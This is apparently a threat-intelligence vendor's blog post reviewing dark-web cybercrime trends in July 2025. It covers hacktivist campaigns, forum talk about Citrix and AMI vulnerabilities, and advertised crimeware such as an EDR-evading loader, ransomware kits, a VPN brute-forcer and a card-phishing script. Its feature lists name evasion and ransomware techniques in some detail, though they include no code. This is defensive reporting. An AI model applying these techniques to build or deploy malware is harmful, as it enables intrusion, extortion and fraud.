From the pro-Russian hacktivist groups to advanced loaders for stealthy payload delivery, KELA has captured the latest tools, services, and cybercriminal trends emerging on the dark web.

In this inaugural post of KELA's new blog series, we’ll dive into the evolving landscape of cybercrime in July 2025, highlighting the most significant threats, including ransomware delivery systems, phishing tools, and the shifts in hacktivism, alongside active vulnerabilities currently fueling cybercriminal activity.

» Strengthen your cybersecurity with KELA's expertise

Hacktivist Activity 

The most active hacktivist groups claiming attacks in their Telegram channels were those involved in a joint operation against Israel (#OpIsrael), as well as the pro-Palestinian and Southeastern hacktivist teams Tengkorak Cyber Crew, Laskar Pembebasan Palestina, Cyber Isnaad Front, Z-Pentest Alliance, Laskar Pembebasan Palestina, Malaysia Hacktivist Cyber Team, Malaysia Hacktivist, and the Pro-Russian NoName057(16).

These groups had the most domains in their messages (presumably victims’ domains), a pattern associated with claimed DDoS and defacement, data theft, and other attacks. The following groups were specifically claiming the most DDoS attacks (based on the attacked websites’ accessibility reports provided as proof): NoName057(16), Z-Pentest Alliance, Mr Hamza, Anonymous VNLBN, Team Fearless, and Resistance Squad. 

The hacktivist activity demonstrated both persistence and tactical evolution across ideological lines. Pro-Russian group NoName057(16) continued operations despite law enforcement crackdowns, targeting digital infrastructure in France and Germany under #OpFrance and #OpGermany, and maintaining a presence through alternative Telegram channels.

Meanwhile, Cyber Partisans deployed Telegram-controlled malware and wipers in attacks against Russian and Belarusian networks. Other groups, including 313Team and Liwaa Mohammad, released custom malware and ransomware variants, further reflecting a potential shift towards more advanced techniques. However, it is not clear how sophisticated this malware is.

» Learn more about how ransomware operators gain access

Stay Ahead of Hacktivist Threats

Keep informed about evolving hacktivist tactics and safeguard your digital assets.

Contact Us



Vulnerabilities Chatter 

Over the past month, KELA has observed active discussions on cybercrime forums concerning vulnerabilities disclosed in 2024 and 2025, indicating interest in these flaws. One thread was focused on CVE-2025-5777, an out-of-bounds read vulnerability affecting Citrix. An actor shared a link to a public PoC shared on GitHub, noting it was not practical and asking for help, to which others responded with suggestions to improve the PoC.

Additional discussion centered on CVE-2024-54085, an authentication bypass vulnerability in AMI’s SPx BMC. An actor was searching for a public PoC, while another commented with a GitHub page linked to the exploit and claimed it appears to be in use, though provided no further detail and stated they had not personally tested it. There is no indication that the original actor who requested the PoC successfully obtained or used it.

Discussions also focused on zero-day exploits. One actor advertised a Joomla! 5.3.2 shell upload exploit for sale, priced at 0.65 BTC via escrow. The actor, operating under the handle "Wests11", has a history of offering similar exploits, including one previously targeting WordPress, though some users in the thread questioned their credibility. Another actor claimed to be selling an exploit for USD 40,000, targeting BUK TS-G gas pumps with online Human-Machine Interface (HMI) panels, developed by Russian manufacturer Nefteprodukttekhnika.

The vulnerability allegedly allows remote authentication bypass, giving attackers full administrative access to the pump control panel. This includes the ability to manipulate inventory, change configurations, and disable services. The seller claims over 50 publicly accessible devices are vulnerable, with a likely broader impact on privately hosted systems. Additional proof and access to images are offered via private messages or Telegram.

» Make sure you know the difference between a vulnerability, a threat, and a risk

Cybercrime Services 

This month, KELA has uncovered a variety of new offerings, including advanced payload loaders, code obfuscation services, ransomware-as-a-service platforms, and more. Below, we’ll explore the key services and their potential impact on cybersecurity. 

Advanced Loader for Payload Delivery

KELA identified “Beaconism”, an advanced loader for stealthy payload delivery and EDR/XDR evasion, offering two position-independent frameworks (Native x64 and Beacon x64) to avoid traditional C2 solutions. It employs sophisticated evasion techniques like full IAT fixing and obfuscation, spoofed thread execution, and sleep obfuscation. The system also includes official Beaconism Beacons for .NET x64 execution with custom AES encryption, AMSI patch, and EAT Hooking for ETW patch.

The core loader is built for evasion with EV signatures, indirect syscalls, no RWX memory, NTDLL & KERNEL32 unhooking, and triple Anti-VM layers. For APT-grade persistence, it uses NT/AUTHORITY tokens for SID retrieval and registry-based persistence via indirect syscalls, avoiding cmd.exe or PowerShell. Beaconism is priced at $2,000 per month for 5 slots.

» Learn how KELA's intelligence platform can block ransomware attacks and drive ROI

Code Obfuscation Service

An undetectable code obfuscation service designed to bypass Anti-Virus (AV) and EDR systems at both scantime and runtime for executable files was also advertised. This service utilizes multi-level code obfuscation and encryption along with binary mutation during encryption to create unique, signature-evading results.

It provides an adaptive evasion level and conducts complete control flow graph morphing to defeat static analysis, while also using low-level thread manipulation and API call spoofing to disrupt heuristic analysis. Verified on over 50 antivirus systems, this crypting service will not function in CIS countries. The cost for this service is $40.

Advanced Encryptor-Decryptor System

A comprehensive Advanced Encryptor-Decryptor System is available as a complete kit with full source code for the encoder, decoder, and builder, leveraging robust cryptography (curve25519/XChaCha20/blake3) with a unique secret key per file, making recovery impossible without the embedded key. It features a cryptographically strong Pseudo-Random Number Generator (PRNG) and supports flexible file encryption (full or chunk-based) and flexible filtering.

The system supports a wide range of operating systems and architectures, including Windows (Win7-Win11, WinServer2008-WinServer2025 across i686/x86_64/aarch64), various Nix systems, BSD, and ESXi (versions 3.5-8).

Windows builds include automatic privilege escalation (UAC bypass to SYSTEM), service termination, Volume Shadow Copy removal, Windows Recycle Bin cleanup, mounting of unallocated disk partitions, processing of network shares, and termination of processes holding files. Nix builds support for background operation, ESXi VM-killer functionality, and removal of ESXi virtual machine snapshots. The builder component is fully offline and generates a new secret key for each iteration. This system is priced at $30,000 in BTC/XMR.

Kryptina v4.0

KELA has identified Kryptina v4.0, a Ransomware-as-a-Service (RaaS) platform, whose current version is designed to be extremely fast and lightweight, with a payload size as small as 20 KB, and boasts a clean, functional web and command-line interface. It offers a powerful REST API exposing all core features for easy extension and workflow automation, supporting both 32-bit and 64-bit systems with static and dynamic linking.

Kryptina employs a combined blacklist and whitelist approach for file targeting and features a robust administrative web interface that includes a team-based design allowing operators to share targets and communicate via a real-time chat, with a strong focus on stealth, operational security, and robust activity logging. The price for Kryptina v4.0 and newer versions is $1,000. As of now, KELA observed no notable engagement with this post.

» Make sure you know how to spot ransomware attacks

SpecScan Target Scanner

A high-performance target scanner named SpecScan has been observed, developed in Go to ensure excellent speed when scanning large lists of URLs and IP:ports. This tool is designed to find new targets that may not be readily available on public scanners like Shodan, Fofa, or ZoomEye. SpecScan supports YAML templates for precise identification of various web services and applications, including RDWeb, OWA, Forti, Cisco, WordPress, and Magento, with the flexibility to quickly add or modify templates for specific needs. It runs on Windows with minimal requirements and is available for $50 per month. 

Cross-Platform Software for Obtaining Corporate VPN Access

KELA has identified cross-platform software for obtaining corporate VPN access, with prices starting at $300 per vendor. The software is written in clean Go code, allowing for unlimited runs without license ties. It offers both scanner and bruteforcer modes for vendors such as Cisco and Forti, supporting multiple proxy types (HTTP and SOCKS) and including a honey pot protection.

The tool provides a GUI for Windows users and a CLI version compatible with all operating systems, with the GUI-less version provided as a bonus. The developer guarantees free updates for at least three months and offers a demo version for testing. 

Win + R CAPTCHA Bypass Tool

KELA saw a Win + R CAPTCHA bypass tool that has been advertised, designed for automated file downloads and execution after a CAPTCHA checkbox click. This tool features a minimalist admin panel, clean PHP code with a focus on stability and security, and is compatible with all recent browser versions. It allows for uploading multiple dropper files for randomness and offers extensive customization for landing pages, including support for WordPress with admin filtering.

While the tool requires the user to supply "good droppers," it promises significantly higher profit compared to command-line CAPTCHA solutions and is priced at $1,200 per license. 

CC+3DS Phishing Script

ACC+3DS Phishing Script is being sold, which includes a Stripe-based payment system to capture card details and bank SMS. The comprehensive package supports 27 languages, comes with an abuse-resistant server, domain, and SSL, and provides detailed guides for creating fake shops and for SEO/promotion across platforms like Google, Facebook, and Reddit. The seller offers various purchase options, including a fully set-up shop and assistance with ad campaigns, along with 14 days of 24/7 support.

Looking Ahead: Tracking Tomorrow’s Cybercrime Trends

The activity and services highlighted in this month’s review represent just a fraction of the ongoing innovations within the cybercrime ecosystem. By understanding these threats, security professionals can better prepare their defenses and respond proactively to emerging risks.

Stay tuned for next month’s update, where we’ll continue to track and analyze the newest cybercrime threats and trends.

» If you want a deeper dive into the latest threats and services that KELA is tracking, contact us today